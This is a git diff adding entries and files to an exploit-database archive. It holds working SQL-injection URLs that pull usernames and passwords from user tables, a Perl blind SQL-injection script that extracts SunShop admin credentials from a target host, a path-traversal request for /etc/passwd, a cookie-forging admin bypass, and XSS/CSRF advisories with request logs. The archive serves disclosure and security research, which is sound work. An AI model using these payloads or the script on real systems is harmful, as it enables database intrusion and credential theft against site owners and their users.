diff --git a/files.csv b/files.csv
index 6e6494fc4..133400a33 100755
--- a/files.csv
+++ b/files.csv
@@ -28576,3 +28576,25 @@ id,file,description,date,author,platform,type,port
31785,platforms/multiple/dos/31785.txt,"Multiple Platform IPv6 Address Publication Denial of Service Vulnerabilities",2008-05-13,"Tyler Reguly",multiple,dos,0
31786,platforms/asp/webapps/31786.txt,"Cisco BBSM Captive Portal 5.3 'AccesCodeStart.asp' Cross-Site Scripting Vulnerability",2008-05-13,"Brad Antoniewicz",asp,webapps,0
31787,platforms/php/webapps/31787.txt,"Kalptaru Infotech Automated Link Exchange Portal 'linking.page.php' SQL Injection Vulnerability",2008-05-13,HaCkeR_EgY,php,webapps,0
+31788,platforms/windows/remote/31788.py,"VideoCharge Studio 2.12.3.685 GetHttpResponse() - MITM Remote Code Execution Exploit",2014-02-20,"Julien Ahrens",windows,remote,0
+31790,platforms/hardware/webapps/31790.txt,"Barracuda Firewall 6.1.0.016 - Multiple Vulnerabilities",2014-02-20,Vulnerability-Lab,hardware,webapps,0
+31791,platforms/windows/dos/31791.py,"Catia V5-6R2013 ""CATV5_Backbone_Bus"" - Stack Buffer Overflow",2014-02-20,"Mohamed Shetta",windows,dos,55555
+31792,platforms/php/webapps/31792.txt,"Stark CRM 1.0 - Multiple Vulnerabilities",2014-02-20,LiquidWorm,php,webapps,80
+31793,platforms/php/webapps/31793.txt,"Horde Turba 3.1.7 Multiple Cross-Site Scripting Vulnerabilities",2008-05-14,"Ivan Javier Sanchez",php,webapps,0
+31794,platforms/php/webapps/31794.txt,"PicsEngine 1.0 'index.php' Cross Site Scripting Vulnerability",2008-05-14,ZoRLu,php,webapps,0
+31795,platforms/php/webapps/31795.txt,"Links Pile 'link.php' SQL Injection Vulnerability",2008-08-14,HaCkeR_EgY,php,webapps,0
+31796,platforms/php/webapps/31796.txt,"Internet Photoshow 'login_admin' Parameter Unauthorized Access Vulnerability",2008-05-14,t0pP8uZz,php,webapps,0
+31797,platforms/asp/webapps/31797.txt,"Philboard 0.5 W1L3D4_foruma_yeni_konu_ac.asp forumid Parameter SQL Injection",2008-05-14,U238,asp,webapps,0
+31798,platforms/php/webapps/31798.txt,"Philboard 0.5 W1L3D4_konuoku.asp id Parameter SQL Injection",2008-05-14,U238,php,webapps,0
+31799,platforms/php/webapps/31799.txt,"Philboard 0.5 W1L3D4_konuya_mesaj_yaz.asp Multiple Parameter SQL Injection",2008-05-14,U238,php,webapps,0
+31800,platforms/php/webapps/31800.pl,"SunShop Shopping Cart <= 3.5.1 'index.php' SQL Injection Vulnerability",2008-05-15,irvian,php,webapps,0
+31801,platforms/php/webapps/31801.txt,"ACGV News 0.9.1 glossaire.php id Parameter SQL Injection",2008-05-16,ZoRLu,php,webapps,0
+31802,platforms/php/webapps/31802.txt,"ACGV News 0.9.1 glossaire.php id Parameter XSS",2008-05-16,ZoRLu,php,webapps,0
+31803,platforms/php/webapps/31803.txt,"AN Guestbook 0.4 'send_email.php' Cross Site Scripting Vulnerability",2008-05-16,ZoRLu,php,webapps,0
+31804,platforms/php/webapps/31804.txt,"Digital Hive 2.0 'base_include.php' Local File Include Vulnerability",2008-05-16,ZoRLu,php,webapps,0
+31805,platforms/php/webapps/31805.txt,"PHP-Nuke 'KuiraniKerim' Module 'sid' Parameter SQL Injection Vulnerability",2008-05-17,Lovebug,php,webapps,0
+31806,platforms/php/webapps/31806.txt,"bcoos 1.0.13 'file' Parameter Local File Include Vulnerability",2008-05-19,Lostmon,php,webapps,0
+31807,platforms/php/webapps/31807.txt,"cPanel <= 11.21 'wwwact' Remote Privilege Escalation Vulnerability",2008-05-19,"Ali Jasbi",php,webapps,0
+31808,platforms/php/webapps/31808.txt,"AppServ Open Project <= 2.5.10 'appservlang' Parameter Cross Site Scripting Vulnerability",2008-05-20,"CWH Underground",php,webapps,0
+31809,platforms/php/webapps/31809.txt,"Starsgames Control Panel 4.6.2 'index.php' Cross Site Scripting Vulnerability",2008-05-20,"CWH Underground",php,webapps,0
+31810,platforms/php/webapps/31810.txt,"Web Slider 0.6 'slide' Parameter SQL Injection Vulnerability",2008-05-20,"fahn zichler",php,webapps,0
diff --git a/platforms/asp/webapps/31797.txt b/platforms/asp/webapps/31797.txt
new file mode 100755
index 000000000..821ec675d
--- /dev/null
+++ b/platforms/asp/webapps/31797.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29229/info
+
+Philboard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Philboard 0.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com:2222/lab/philboard_v5/W1L3D4_foruma_yeni_konu_ac.asp?forumid=1+union+select+0,1,(username),(password),1,1+from+users
\ No newline at end of file
diff --git a/platforms/hardware/webapps/31790.txt b/platforms/hardware/webapps/31790.txt
new file mode 100755
index 000000000..228cb0045
--- /dev/null
+++ b/platforms/hardware/webapps/31790.txt
@@ -0,0 +1,319 @@
+Document Title:
+===============
+Barracuda Bug Bounty #30 Firewall - Multiple Persistent Web Vulnerabilities
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1065
+
+Barracuda Networks Security ID (BNSEC): BNSEC-2067
+
+Video: http://www.vulnerability-lab.com/get_content.php?id=1208
+
+View Video: http://www.youtube.com/watch?v=-yQVyik3Ggo
+
+
+Release Date:
+=============
+2014-02-19
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1065
+
+
+Common Vulnerability Scoring System:
+====================================
+3.9
+
+
+Product & Service Introduction:
+===============================
+The Barracuda Firewall goes beyond traditional network firewalls and UTMs by providing powerful network security, granular layer 7
+application controls, user awareness and secure VPN connectivity combined with cloud-based malware protection, content filtering
+and reporting. It alleviates the performance bottlenecks in Unified Threat Management (UTM) appliances through intelligent integration
+of on-premise and cloud-based technologies. While the powerful on-premises appliance is optimized for tasks like packet forwarding and
+routing, Intrusion Prevention (IPS), DNS/DHCP services and site-to-site connectivity; CPU intensive tasks like virus scanning, content
+filtering and usage reporting benefit from the scalable performance and elasticity of the cloud.
+
+(Copy of the Vendor Homepage: https://www.barracuda.com/products/firewall )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered multiple persistent input validation web vulnerabilities in the Barracuda Web Firewall appliance web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2013-09-04: Researcher Notification & Coordination (Benjamin Kunz Mejri)
+2013-09-05: Vendor Notification (Barracuda Networks Security Team - Bug Bounty Program)
+2013-09-26: Vendor Response/Feedback (Barracuda Networks Security Team - Bug Bounty Program)
+2014-02-17: Vendor Fix/Patch (Barracuda Networks Developer Team) [Coordinated Disclosure]
+2014-02-19: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Barracuda Networks
+Product: Web Firewall 6.1.0.016 - Models: X100; X200; X300; X400 & X600
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+Multiple persistent input validation web vulnerabilities are detected in the Barracuda Networks Web Firewall X300 (v6.1.0.016) Appliance Web Application.
+The validation web vulnerability allows remote attackers or local low privileged application user accounts to inject (persistent) own malicious script
+codes on application-side of the vulnerable module.
+
+The vulnerability is located in the firewall menu when processing to create a custom user object with manipulated create user expresson
+group credentials. Remote attackers can inject script codes to the `Login Name` & `Group Match pattern text` input fields. After the inject
+the attacker can save the input via add (POST Method) to execute the persistent code in the edit listing. After the first add (inject) in the
+edit formular the remote attacker is also able to add the input via `add to the second selection` listing to execute the persistent code in
+both listing values of the bottom page. Remote attackers are able to add the persistent injected context to the main custom user objects
+module in the predefined user objects listing. The attack vector is persistent and the request method is POST. The security risk of the
+persistent input validation web vulnerabilities are estimated as medium with a cvss (common vulnerability scoring system) count of 3.8(+)|(-)3.9.
+
+Exploitation of the vulnerability requires a low privileged application user account and low user interaction. Successful exploitation results
+in session hijacking, persistent phishing, persistent external redirects & persistent manipulation of affected or connected web module context.
+
+
+Vulnerable Application(s):
+ [+] Firewall (WAF) Appliance Application (X300Vx v6.1.0.016)
+
+Vulnerable Module(s):
+ [+] Firewall > User Objects > Custom User Objects > Create User Object > Create User Expression
+
+Vulnerable Parameter(s):
+ [+] login name
+ [+] pattern - Group Match
+
+Affected Module(s):
+ [+] Firewall > User Objects > Custom User Objects > Predefined User Objects Listing
+ [+] Firewall > User Objects > Custom User Objects > Create User Object > Create User Expression (Group)
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged application user account and low user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
+
+Manual steps to reproduce the vulnerability:
+
+1. Login with the user account to the barracuda networks web firewall appliance application
+2. After the login open the firewall and switch to the User Objects > Custom User Objects > Create User Object module
+3. Start creating via user expression a group
+4. Include a random name for the main mask, and add your script code as payload to the login name and pattern (group match) input fields
+5. Click the checkbox for the group match and click the add button to save the input
+6. The code executes in the add box context itself and the group match or pattern values listing (bottom) [3 times]
+7. Now, the attacker is also able to add the already injected persistent context to the main menu listing by a click of the add button to save at the bottom
+8. The script code execution occurs when processing to watch the firewall_user_objects module index item listing
+Note: The vulnerable values are login name (name) and pattner
+9. Successful reproduce of the persistent web vulnerabilities!
+
+
+PoC: firewall_user_objects - index listing
+
+
+
+
+
<[PERSISTENT INJECTED SCRIPT CODE!]>
+
<[PERSISTENT INJECTED SCRIPT CODE!]>
+
+
+
+
+Reference(s):
+https://firewall.ptest.localhost:6299/cgi-mod/index.cgi
+?auth_type=Local&et=1378340277&locale=en_US&password=b9bc2762a9868729613918058ac1fb56&user=guest&primary_tab=FIREWALL&secondary_tab=firewall_user_objects
+
+
+PoC: Create User Object > Create User Expression - Listing
+
+
+
+
Group Match
?????
+
+
Pattern
+
+
a%20>"<[PERSISTENT INJECTED SCRIPT CODE!]">
?????
+
+
+
+
+
+
+
+
+
+
List of user group patterns according to efficient authentication method.
+If the check box is cleared, only one list item may match. Default: Off
+
+
+
+--- Request Session Logs ---
+
+Status: 200[OK]
+POST https://firewall.ptest.localhost:6299/cgi-mod/index.cgi
+Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ]
+Content Size[-1] Mime Type[text/plain]
+
+Request Headers:
+Host[firewall.ptest.localhost:6299]
+User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
+Accept[text/javascript, text/html, application/xml, text/xml, */*]
+Accept-Language[en-US,en;q=0.5]
+Accept-Encoding[gzip, deflate]
+DNT[1]
+X-Requested-With[XMLHttpRequest]
+X-Prototype-Version[1.7]
+Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
+Referer[https://firewall.ptest.localhost:6299/cgi-mod/index.cgi?
+password=4b3c71efe69b776c7af9c2a0e44d8da6&et=1378331067&content_only=1&primary_tab=FIREWALL&new_secondary_tab=
+firewall_user_objects&auth_type=Local&user=guest&locale=en_US&secondary_tab=add_firewall_user_object&ispopup=1&
+parent_name=add_firewall_user_object&popup_width=530&popup_height=500]
+Content-Length[237]
+Connection[keep-alive]
+Pragma[no-cache]
+Cache-Control[no-cache]
+Post Data:
+ajax_action[check_param_ajax_single]
+name[group_match_pattern]
+value[(PERSISTENT INJECTED SCRIPT CODE!)<]
+user[guest]
+password[2f156d447f2d3972ab50762e5b0f581d]
+et[1378331075]
+locale[en_US]
+auth_type[Local]
+realm[]
+
+
+Response Headers:
+Server[BarracudaFirewallHTTP 4.0]
+Date[Wed, 04 Sep 2013 21:26:16 GMT]
+Content-Type[text/plain; charset=utf-8]
+Transfer-Encoding[chunked]
+Connection[keep-alive]
+
+
+GET https://firewall.ptest.localhost:6299/cgi-mod/[PERSISTENT INJECTED SCRIPT CODE!]<
+Load Flags[LOAD_DOCUMENT_URI ]
+Content Size[1789] Mime Type[text/html]
+Request Headers:
+Host[firewall.ptest.cudasvc.com]
+User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
+Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+Accept-Language[en-US,en;q=0.5]
+Accept-Encoding[gzip, deflate]
+DNT[1]
+Referer[https://firewall.ptest.localhost:6299/cgi-mod/index.cgipassword=4b3c71efe69b776c7af9c2a0e44d8da6&et=1378331067&content_only=
+1&primary_tab=FIREWALL&new_secondary_tab=firewall_user_objects&auth_type=Local&user=guest&locale=en_US&secondary_tab=
+add_firewall_user_object&ispopup=1&parent_name=add_firewall_user_object&popup_width=530&popup_height=500]
+Connection[keep-alive]
+Response Headers:
+Server[BarracudaFirewallHTTP 4.0]
+Date[Wed, 04 Sep 2013 21:26:16 GMT]
+Content-Type[text/html]
+Content-Length[1789]
+Connection[keep-alive]
+
+Reference(s):
+https://firewall.ptest.localhost:6299/cgi-mod/index.cgi?
+password=a1524626db9371fd7c3db09cc21836aa&et=1378331929&content_only=1&primary_tab=FIREWALL&new_secondary_tab=firewall_user_objects
+&auth_type=Local&user=guest&locale=en_US&secondary_tab=add_firewall_user_object&ispopup=1&parent_name=add_firewall_user_object&
+popup_width=530&popup_height=500
+
+
+https://firewall.ptest.localhost:6299/cgi-mod/index.cgi?
+auth_type=Local&et=1378340277&locale=en_US&password=b9bc2762a9868729613918058ac1fb56&user=guest&primary_tab=FIREWALL&
+secondary_tab=firewall_user_objects
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure parse of the match group pattern and login name input fields in the firewall_user_objects module.
+Encode also the vulnerable output item listing of the pattern text and login name in the main- and edit firewall_user_objects listing to prevent
+further persistent script code injection attacks via POST method request. Implement the regular alos the regular formular validation of barracuda
+the the item list module.
+
+2014-02-17: Vendor Fix/Patch (Barracuda Networks Developer Team) [Coordinated Disclosure]
+
+Barracuda Networks: Appliances > Advanced > Firmware Updates (automatic) page or use the regular customer panel (https://login.barracudanetworks.com/auth/login/) to update manually.
+
+
+Security Risk:
+==============
+The security risk of the persistent input validation web vulnerabilities are estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
+Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
+profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
+states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
+may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
+or trade with fraud/stolen material.
+
+Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
+Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
+Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
+Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
+other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
+modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+ Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
+
+
+
+
+
+--
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
diff --git a/platforms/php/webapps/31792.txt b/platforms/php/webapps/31792.txt
new file mode 100755
index 000000000..d3d4b3adc
--- /dev/null
+++ b/platforms/php/webapps/31792.txt
@@ -0,0 +1,170 @@
+?
+Stark CRM v1.0 Multiple Script Injection And Session Riding Vulnerabilities
+
+
+Vendor: IWCn Systems Inc.
+Product web page: http://www.iwcn.ws
+Affected version: 1.0
+
+Summary: This is a light weight CRM which simplifies process
+of managing staff, client and projects.
+
+Desc: Multiple stored XSS and CSRF vulnerabilities exist when
+parsing user input to several POST parameters. The application
+allows users to perform certain actions via HTTP requests without
+performing any validity checks to verify the requests. This
+can be exploited to perform certain actions with administrative
+privileges if a logged-in user visits a malicious web site and/or
+execute arbitrary HTML and script code in a user's browser session.
+
+Tested on: Nginx, PHP, MySQL
+
+
+Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2014-5169
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5169.php
+
+
+03.02.2014
+
+--
+
+
+CSRF (Add Admin):
+################
+
+
+
+
+
+
+
+
+
+
+
+Stored XSS (parameter: name):
+############################
+
+POST /testing/index.php?page=add_ticket HTTP/1.1
+Host: lab17.zeroscience.mk
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://lab17.zeroscience.mk/testing/index.php?page=add_ticket
+Cookie: PHPSESSID=51422dfc2ef2d3569e778d06d20c7a25
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=---------------------------94321629522129
+Content-Length: 592
+
+-----------------------------94321629522129
+Content-Disposition: form-data; name="name"
+
+">
+-----------------------------94321629522129
+Content-Disposition: form-data; name="project"
+
+1
+-----------------------------94321629522129
+Content-Disposition: form-data; name="description"
+
+ZSL
+-----------------------------94321629522129
+Content-Disposition: form-data; name="file"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------94321629522129
+Content-Disposition: form-data; name="submit"
+
+
+-----------------------------94321629522129--
+
+
+
+
+Stored XSS (parameters: first_name, last_name, notes):
+#####################################################
+
+
+
+
+
+
+
+
+
+
+Stored XSS (parameters: insu_name, price):
+#########################################
+
+
+
+
+
+
+
+
+
+
+Stored XSS (parameter: status[]):
+################################
+
+
+
+
+
+
diff --git a/platforms/php/webapps/31793.txt b/platforms/php/webapps/31793.txt
new file mode 100755
index 000000000..87f47353f
--- /dev/null
+++ b/platforms/php/webapps/31793.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/29213/info
+
+Horde Turba is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Turba Content Manger 2.1.7 is vulnerable; other versions may also be affected.
+
+1-object%5Bemail5D= ">
+2-object%5Btitle5D= ">
diff --git a/platforms/php/webapps/31794.txt b/platforms/php/webapps/31794.txt
new file mode 100755
index 000000000..b58ae8ca1
--- /dev/null
+++ b/platforms/php/webapps/31794.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/29214/info
+
+PicsEngine is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+PicsEngine 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/1_0/admin/index.php?l=[XSS]
+
diff --git a/platforms/php/webapps/31795.txt b/platforms/php/webapps/31795.txt
new file mode 100755
index 000000000..8db03ae46
--- /dev/null
+++ b/platforms/php/webapps/31795.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/29223/info
+
+Links Pile is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/link.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,18/**/from/**/lp_user_tb/*
\ No newline at end of file
diff --git a/platforms/php/webapps/31796.txt b/platforms/php/webapps/31796.txt
new file mode 100755
index 000000000..7d9d58411
--- /dev/null
+++ b/platforms/php/webapps/31796.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/29227/info
+
+Internet Photoshow is prone to a vulnerability that can result in unauthorized database access.
+
+Attackers can exploit this issue to gain administrative access to the application.
+
+Internet Photoshow Special Edition is vulnerable; other editions may also be affected.
+
+The following example code is available:
+
+javascript:document.cookie = "login_admin=true; path=/";
+
diff --git a/platforms/php/webapps/31798.txt b/platforms/php/webapps/31798.txt
new file mode 100755
index 000000000..20212376c
--- /dev/null
+++ b/platforms/php/webapps/31798.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29229/info
+
+Philboard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Philboard 0.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com:2222/lab/philboard_v5/W1L3D4_konuoku.asp?id=1+union+select+0,1,2,3,4,5,6,1,1,1,1,1,1,1,7,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,8,9,1,1,1,1,1,1,1,1,1,1+from+users
\ No newline at end of file
diff --git a/platforms/php/webapps/31799.txt b/platforms/php/webapps/31799.txt
new file mode 100755
index 000000000..847cf4e39
--- /dev/null
+++ b/platforms/php/webapps/31799.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29229/info
+
+Philboard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Philboard 0.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com:2222/lab/philboard_v5/W1L3D4_konuya_mesaj_yaz.asp?id=1+union+select+(password),username,password,password,4,1,1,1,null,1,password,password,password,password,password+from+users
\ No newline at end of file
diff --git a/platforms/php/webapps/31800.pl b/platforms/php/webapps/31800.pl
new file mode 100755
index 000000000..891062467
--- /dev/null
+++ b/platforms/php/webapps/31800.pl
@@ -0,0 +1,101 @@
+source: http://www.securityfocus.com/bid/29241/info
+
+SunShop Shopping Cart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+SunShop Shopping Cart 3.5.1 is vulnerable; other versions may also be affected.
+
+#!/usr/bin/perl -w
+use LWP::UserAgent;
+# scripts : SunShop Version 3.5.1 Remote Blind Sql Injection
+# scripts site : http://www.turnkeywebtools.com/sunshop/
+# Discovered
+# By : irvian
+# site : http://irvian.cn
+# email : irvian.info@gmail.com
+
+print "\r\n[+]-----------------------------------------[+]\r\n";
+print "[+]Blind SQL injection [+]\r\n";
+print "[+]SunShop Version 3.5.1 [+]\r\n";
+print "[+]code by irvian [+]\r\n";
+print "[+]special : ifx, arioo, jipank, bluespy [+]\r\n";
+print "[+]-----------------------------------------[+]\n\r";
+if (@ARGV < 5){
+die "
+
+Cara Mengunakan : perl $0 host option id tabel itemid
+
+Keterangan
+host : http://victim.com
+Option : pilih 1 untuk mencari username dan pilih 2 untuk mencari password
+id : Isi Angka Kolom id biasanya 1, 2 ,3 dst
+tabel : Isi Kolom tabel biasanya admin atau ss_admin
+itemid : Isi Angka valid (ada productnya) di belakang index.php?action=item&id=
+Contoh : perl $0 http://www.underhills.com/cart 1 1 admin 10
+\n";}
+
+
+$url = $ARGV[0];
+$option = $ARGV[1];
+$id = $ARGV[2];
+$tabel = $ARGV[3];
+$itemid = $ARGV[4];
+
+if ($option eq 1){
+syswrite(STDOUT, "username: ", 10);}
+elsif ($option eq 2){
+syswrite(STDOUT, "password: ", 10);}
+
+for($i = 1; $i <= 32; $i++){
+$f = 0;
+$n = 32;
+while(!$f && $n <= 57)
+{
+if(&blind($url, $option, $id, $tabel, $i, $n, $itemid)){
+$f = 1;
+syswrite(STDOUT, chr($n), 1);
+}
+$n++;
+}
+if ($f==0){
+$n = 97;
+while(!$f && $n <= 122)
+{
+if(&blind($url, $option, $id, $tabel, $i, $n, $itemid)){
+$f = 1;
+syswrite(STDOUT, chr($n), 1);
+}
+$n++;
+}
+}
+}
+print "\n[+]finish Execution Exploit\n";
+
+sub blind {
+my $site = $_[0];
+my $op = $_[1];
+my $id = $_[2];
+my $tbl = $_[3];
+my $i = $_[4];
+my $n = $_[5];
+my $item = $_[6];
+
+if ($op eq 1){
+$klm = "username";
+}
+elsif ($op eq 2){
+$klm = "password";
+}
+my $ua = LWP::UserAgent->new;
+my $url = "$site"."/index.php?action=item&id="."$item"."'%20AND%20SUBSTRING((SELECT%20"."$klm"."%20FROM%20"."$tbl"."%20WHERE%20id="."$id"."),"."$i".",1)=CHAR("."$n".")/*";
+my $res = $ua->get($url);
+my $browser = $res->content;
+if ($browser !~ /This product is currently not viewable/i){
+return 1;
+}
+else {
+return 0;
+}
+
+}
diff --git a/platforms/php/webapps/31801.txt b/platforms/php/webapps/31801.txt
new file mode 100755
index 000000000..d9dadbd2f
--- /dev/null
+++ b/platforms/php/webapps/31801.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29253/info
+
+ACGV News is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+ACGV News 0.9.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/ACGVnews/glossaire.php?id=[SQL]
\ No newline at end of file
diff --git a/platforms/php/webapps/31802.txt b/platforms/php/webapps/31802.txt
new file mode 100755
index 000000000..8e9fa593d
--- /dev/null
+++ b/platforms/php/webapps/31802.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29253/info
+
+ACGV News is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+ACGV News 0.9.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/ACGVnews/glossaire.php?id=">
\ No newline at end of file
diff --git a/platforms/php/webapps/31803.txt b/platforms/php/webapps/31803.txt
new file mode 100755
index 000000000..cc0764b5d
--- /dev/null
+++ b/platforms/php/webapps/31803.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/29254/info
+
+AN Guestbook (ANG) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+ANG 0.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/ang/send_email.php?postid=[XSS]
+
diff --git a/platforms/php/webapps/31804.txt b/platforms/php/webapps/31804.txt
new file mode 100755
index 000000000..ba2d275a2
--- /dev/null
+++ b/platforms/php/webapps/31804.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29255/info
+
+Digital Hive is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.
+
+Digital Hive 2.0 RC2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/hive_v2.0_RC2/template/purpletech/base_include.php?page=../../etc/passwd
\ No newline at end of file
diff --git a/platforms/php/webapps/31805.txt b/platforms/php/webapps/31805.txt
new file mode 100755
index 000000000..c30fc52df
--- /dev/null
+++ b/platforms/php/webapps/31805.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/29261/info
+
+The 'KuiraniKerim' module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/modules.php?name=KuraniKerim&op=TurkceNuke_Com_Islami_Moduller_Destek_Sitesi&sid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd,aid,2,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A
\ No newline at end of file
diff --git a/platforms/php/webapps/31806.txt b/platforms/php/webapps/31806.txt
new file mode 100755
index 000000000..9f2516078
--- /dev/null
+++ b/platforms/php/webapps/31806.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29275/info
+
+The 'bcoos' program is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability using directory-traversal strings to include local scripts in the context of the application. This may allow the attacker to access sensitive information that may aid in further attacks.
+
+This issue affects bcoos 1.0.13; other versions may also be affected.
